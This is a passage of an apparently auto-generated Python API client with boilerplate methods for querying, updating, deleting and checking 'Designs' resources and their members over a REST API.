raise ValueError("Missing the required parameter `id` when calling `designs_id_head`")
collection_formats = {}
resource_path = '/Designs/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_count_get(self, id, **kwargs):
"""
Counts members of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_members_count_get_with_http_info(id, **kwargs)
return data
def designs_id_members_count_get_with_http_info(self, id, **kwargs):
"""
Counts members of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/members/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_delete(self, id, **kwargs):
"""
Deletes all members of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_members_delete_with_http_info(id, **kwargs)
return data
def designs_id_members_delete_with_http_info(self, id, **kwargs):
"""
Deletes all members of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_get(self, id, **kwargs):
"""
Queries members of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[TeamMember]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_members_get_with_http_info(id, **kwargs)
return data
def designs_id_members_get_with_http_info(self, id, **kwargs):
"""
Queries members of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[TeamMember]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_get`")
collection_formats = {}
resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamMember]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_post(self, id, **kwargs):
"""
Creates a new instance in members of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_members_post_with_http_info(id, **kwargs)
return data
def designs_id_members_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in members of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_post`")
collection_formats = {}
resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_rel_fk_delete(self, id, fk, **kwargs):
"""
Remove the members relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_rel_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_rel_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Remove the members relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_rel_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_rel_fk_head(self, id, fk, **kwargs):
"""
Check the existence of members relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_head(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_rel_fk_head_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_rel_fk_head_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_rel_fk_head_with_http_info(self, id, fk, **kwargs):
"""
Check the existence of members relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_head_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_rel_fk_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_head`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_head`")
collection_formats = {}
resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_members_rel_fk_put(self, id, fk, **kwargs):
"""
Add a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_members_rel_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_members_rel_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_members_rel_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Add a related item by id for members.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_members_rel_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for members (required)
:param DesignMember data:
:return: DesignMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_members_rel_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_patch(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_patch(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Design data: An object of model property name/value pairs
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_patch_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_patch_with_http_info(id, **kwargs)
return data
def designs_id_patch_with_http_info(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_patch_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Design data: An object of model property name/value pairs
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_patch`")
collection_formats = {}
resource_path = '/Designs/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_permission_delete(self, id, **kwargs):
"""
Deletes permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
